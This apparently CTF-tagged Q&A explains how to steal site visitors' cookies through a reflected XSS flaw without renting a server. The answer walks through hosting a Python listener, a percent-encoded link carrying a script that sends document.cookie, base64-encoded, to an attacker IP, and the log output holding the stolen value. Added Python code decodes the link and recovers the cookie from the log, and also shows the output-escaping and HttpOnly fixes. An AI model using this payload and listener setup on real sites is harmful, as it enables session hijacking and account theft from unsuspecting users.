xssctf

XSS Attack without Web Hosting


I am learning about XSS attacks.

Suppose I have a website (let's call it http://www.animallover.com) which allows me to enter anything into a search bar to search for animal names. The website is vulnerable, as entering <script>alert(1)</script> into the search bar triggers an alert.

My goal is to steal the user's cookie by asking the user to visit http://www.animallover.com.

I don't have a web server to host my cookie-capture script.

What should I do?


Solution

  • You can set up an HTTP server on your own computer quite easily.

    For example, Python 3 supports the following one-liner HTTP server:

    python -m http.server 8000
    

    This will respond to HTTP requests arriving at port 8000 on your system. Bear in mind that you might need to adjust your firewall and set up port forwarding on your router to allow traffic through to this port. And make sure you enter this command inside an empty folder, as everything inside it will be published on the internet.

    All incoming requests will be logged on the command line terminal. So if you're trying to fetch an admin's cookie value, you could create a link like this (I'm assuming here that your IP address is 12.34.56.78; you can get the correct value from Google):

    http://example.com/search?q=%3Cscript%3Elocation.href%3D%27http%3A%2F%2F12.34.56.78%3A8000%2F%3F%27%2Bbtoa%28document.cookie%29%3B%3C%2Fscript%3E
    

    This will run the following script on the target server:

    <script>location.href='http://12.34.56.78:8000/?'+btoa(document.cookie);</script>
    

    The cookie value will be base64 encoded, so you'll need to decode that when it arrives. The log output will look something like this:

    $ python -m http.server 8000
    99.99.99.99 - - [01/Jan/2021 01:23:45] "GET /?dXNlcj1hZG1pbjsgc2Vzc2lvbl9pZD0xMjM0NTY3OAo= HTTP/1.1" 200 -
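The two decoding steps the answer leaves to the reader (what the percent-encoded link actually reflects, and how to turn the base64 in the access-log line back into a cookie string) are worth doing in code, together with the output-encoding fix that closes the hole. The following is an added example, not code from the original question or answer; the function names are my own, the sample link and log line are the ones quoted in the answer above, and the log-line regex assumes the Common Log Format style that `http.server` prints.

```python
import base64
import html
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlparse

# Sample inputs copied from the answer above: the crafted link and the
# single http.server access-log line it produces on the listening machine.
PAYLOAD_URL = (
    "http://example.com/search?q=%3Cscript%3Elocation.href%3D%27http%3A%2F%2F"
    "12.34.56.78%3A8000%2F%3F%27%2Bbtoa%28document.cookie%29%3B%3C%2Fscript%3E"
)
LOG_LINE = (
    '99.99.99.99 - - [01/Jan/2021 01:23:45] '
    '"GET /?dXNlcj1hZG1pbjsgc2Vzc2lvbl9pZD0xMjM0NTY3OAo= HTTP/1.1" 200 -'
)

# Request portion of a Common Log Format style line (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decode_search_param(url: str) -> str:
    """URL-decode the q= parameter, i.e. the exact string the vulnerable page reflects."""
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    return params.get("q", [""])[0]


def recover_exfiltrated_cookie(log_line: str) -> Optional[str]:
    """Pull the base64 query string out of one access-log line and decode it.

    Returns None when the line has no request, no query, or the query is not
    valid base64, so the function can be mapped over a whole log file safely.
    """
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = unquote(urlparse(match.group("path")).query)
    if not query:
        return None
    query += "=" * (-len(query) % 4)  # btoa() pads, but tolerate a truncated line
    try:
        return base64.b64decode(query, validate=True).decode("utf-8").strip()
    except (ValueError, UnicodeDecodeError):
        return None


def render_results(query: str, escape_output: bool) -> str:
    """Build the results fragment; escape_output=False reproduces the reflection bug."""
    shown = html.escape(query, quote=True) if escape_output else query
    return f"<p>Results for: {shown}</p>"


def contains_script_tag(fragment: str) -> bool:
    """Crude check used to show whether a fragment still carries a live <script>."""
    return re.search(r"<script\b", fragment, re.IGNORECASE) is not None


if __name__ == "__main__":
    script = decode_search_param(PAYLOAD_URL)
    print("reflected script :", script)
    print("recovered cookie :", recover_exfiltrated_cookie(LOG_LINE))
    print("vulnerable html  :", render_results(script, escape_output=False))
    print("escaped html     :", render_results(script, escape_output=True))
```

`recover_exfiltrated_cookie` is the same step an incident responder takes when reviewing a web server log for exfiltration beacons. `render_results` shows why the site in the question is vulnerable: the search term is concatenated into HTML unescaped, and `html.escape` alone is enough to turn the reflected `<script>` into inert text. Marking the session cookie `HttpOnly` is the complementary fix, since `document.cookie` then no longer exposes it to any script that does get injected.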